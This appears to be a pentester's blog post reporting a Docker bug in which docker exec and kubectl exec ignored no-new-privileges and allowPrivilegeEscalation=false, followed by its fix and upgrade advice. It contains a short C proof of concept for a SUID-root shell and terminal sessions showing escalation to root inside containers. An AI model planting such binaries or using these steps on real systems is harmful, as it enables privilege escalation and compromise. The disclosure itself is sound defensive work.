docker/kubectl exec did not respect no-new-privileges and allowPrivilegeEscalation

TL;DR: There was a bug in Docker that caused docker exec to ignore the no-new-privileges security option. This also affected the allowPrivilegeEscalation=false setting in Kubernetes and could have been abused by attackers in certain scenarios. The bug has recently been fixed (confirmed in Docker 18.09.7), so make sure to update Docker!

I recently performed a Kubernetes pentest and encountered some strange behavior that only made sense after some investigation. Unfortunately, at the time of this writing, this behavior is not well covered in the Kubernetes documentation.

A client wanted to secure their pods and prevent them from running as root, so they set a securityContext and specified a non-privileged user via the runAsUser/runAsGroup settings. However, this alone is not bulletproof: a compromised process might still escalate its privileges at runtime, e.g. via SUID root binaries. I created a PoC for this and it worked as expected; I got root despite the non-privileged user specified in the securityContext. But that is not really the focus of this post.
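For the curious, such a PoC can be as simple as a SUID-root setuid(0) wrapper around a shell. The following is only a sketch of how such a binary might be built into an image; the actual /bin/rootshell in the impidio/urootshell image may be implemented differently:

# rootshell.c: if the SUID bit takes effect on execve, the process starts with
# euid 0, setuid(0) succeeds and the spawned shell runs fully as root
cat > rootshell.c <<'EOF'
#include <stdio.h>
#include <unistd.h>

int main(void) {
    if (setuid(0) != 0)          /* fails when no_new_privs neutralizes the SUID bit */
        perror("setuid");
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");
    return 1;
}
EOF
# build it and mark it SUID root while building the image (i.e. as root)
gcc -o /bin/rootshell rootshell.c
chown root:root /bin/rootshell
chmod u+s /bin/rootshell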

Next I wanted to give the client recommendations on how to address this, and if you know the Kubernetes securityContext settings, you are probably aware of the allowPrivilegeEscalation flag. This flag is supposed to prevent exactly what I did in my PoC. From the Kubernetes documentation:

AllowPrivilegeEscalation: Controls whether a process can gain more privileges than its parent process.
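For reference, in a plain pod manifest the relevant settings look roughly like the sketch below (the pod name is a placeholder; further down I set the same flag through kubectl run --overrides instead):

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: urootshell-demo                 # placeholder name
spec:
  containers:
  - name: urootshell
    image: impidio/urootshell:0.2
    command: ["/bin/sh", "-c", "sleep 60m"]
    securityContext:
      runAsUser: 1000                   # the non-root user discussed above
      runAsGroup: 1000
      allowPrivilegeEscalation: false   # sets no_new_privs for the container process
EOF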

So I set this flag to false, used kubectl exec to get into my container, tried to escalate again and checked my uid. I expected the privilege escalation to fail and to still be a non-privileged user afterwards. But here is what I got after executing my SUID root shell:

user@kubernetes-master:~$ kubectl run urootshell --image=impidio/urootshell:0.2 --replicas=1 --overrides='{"spec": {"template": {"spec": {"containers": [{"name": "urootshell", "image": "impidio/urootshell:0.2", "command": ["/bin/sh", "-c", "sleep 60m"], "securityContext": {"allowPrivilegeEscalation": false} }]}}}}'
deployment.apps/urootshell created
user@kubernetes-master:~$ kubectl get pod urootshell-56c65c6666-kgjdr -o yaml | grep allowPriv
      allowPrivilegeEscalation: false
user@kubernetes-master:~$ kubectl exec -it urootshell-56c65c6666-kgjdr -c urootshell -- bash
user@urootshell-56c65c6666-kgjdr:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@urootshell-56c65c6666-kgjdr:~$ ls -l /bin/rootshell
-rwsrwxrwx 1 root root 8352 Sep  5 14:42 /bin/rootshell
user@urootshell-56c65c6666-kgjdr:~$ /bin/rootshell
# id
uid=0(root) gid=1000(user) groups=1000(user)

Still root. Strange. Does the allowPrivilegeEscalation setting not work?

So I confirmed that allowPrivilegeEscalation=false does get passed on to the Docker runtime (as the no-new-privileges security option) for the container in my Kubernetes pod:

user@kubernetes-node1:~$ docker inspect 32ee4c9105a4
...
"SecurityOpt": [
                "no-new-privileges",
                "seccomp=unconfined"
            ],
...
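If you only care about this one field, docker inspect can filter it directly with a Go template (container ID taken from above):

docker inspect -f '{{.HostConfig.SecurityOpt}}' 32ee4c9105a4
# prints: [no-new-privileges seccomp=unconfined]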

Everything looks correctly applied, so why does it not prevent me from escalating? Next, I looked at the processes in the pod directly:

user@kubernetes-master:~$ kubectl exec -it urootshell-56c65c6666-kgjdr -c urootshell -- bash
user@urootshell-56c65c6666-kgjdr:~$ grep NoNewPrivs /proc/1/status
NoNewPrivs:     1
user@urootshell-56c65c6666-kgjdr:~$ grep NoNewPrivs /proc/$$/status
NoNewPrivs:     0
user@urootshell-56c65c6666-kgjdr:~$ /bin/rootshell
# id
uid=0(root) gid=1000(user) groups=1000(user)
# grep NoNewPrivs /proc/$$/status
NoNewPrivs:     0

Interesting: the actual container process (PID 1) had NoNewPrivs correctly applied at the kernel level, but the bash I got via kubectl exec did not, and neither did my SUID root shell (rootshell).
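To see this at a glance, you can dump the NoNewPrivs flag for every process visible inside the pod, straight from the kubectl-exec shell:

# list NoNewPrivs for every process in the container's PID namespace
for status in /proc/[0-9]*/status; do
  printf '%s  %s\n' "$status" "$(grep NoNewPrivs "$status")"
done
# the container's main process (/proc/1) reports NoNewPrivs: 1,
# while shells spawned via kubectl exec report NoNewPrivs: 0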

To me this looked like a bug, or even a vulnerability. But is it in Kubernetes or in Docker? To find out, I checked whether the same thing happens with plain Docker. First I ran a container interactively with the no-new-privileges security option set and tried to escalate:

user@kubernetes-node1:~$ docker run -it --security-opt no-new-privileges impidio/urootshell:0.4
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ /bin/rootshell
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Seems to work correctly. However, when I used docker exec to go into the same container, it was again possible to escalate:

user@kubernetes-node1:~$ docker exec -it fd9dce6682b8 /bin/sh
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ /bin/rootshell
# id
uid=0(root) gid=1000(user) groups=1000(user)

So this is in fact not a Kubernetes issue, but a docker exec issue!

After some further research, I came across this bug report and clicked through a few references until I ended up here [2]. This described exactly my problem, and it seems to have been resolved only quite recently.

So I upgraded to the latest Docker version available for Ubuntu, which was 18.09.7 at the time of this writing, to confirm that this issue has been resolved, and indeed it has:

root@ubuntu:/home/user# docker exec -it 0d sh
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ /bin/rootshell
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
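For completeness: checking which engine version a node runs is a one-liner, and how you pull in the patched package depends on whether Docker was installed from Ubuntu's docker.io package or from Docker's own docker-ce repository:

# show the running engine version
docker version --format '{{.Server.Version}}'
# upgrade the engine (pick the package that matches your installation)
sudo apt-get update && sudo apt-get install --only-upgrade docker.io
# or: sudo apt-get update && sudo apt-get install --only-upgrade docker-ce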

So hopefully this is something we won’t need to worry about anymore in the future!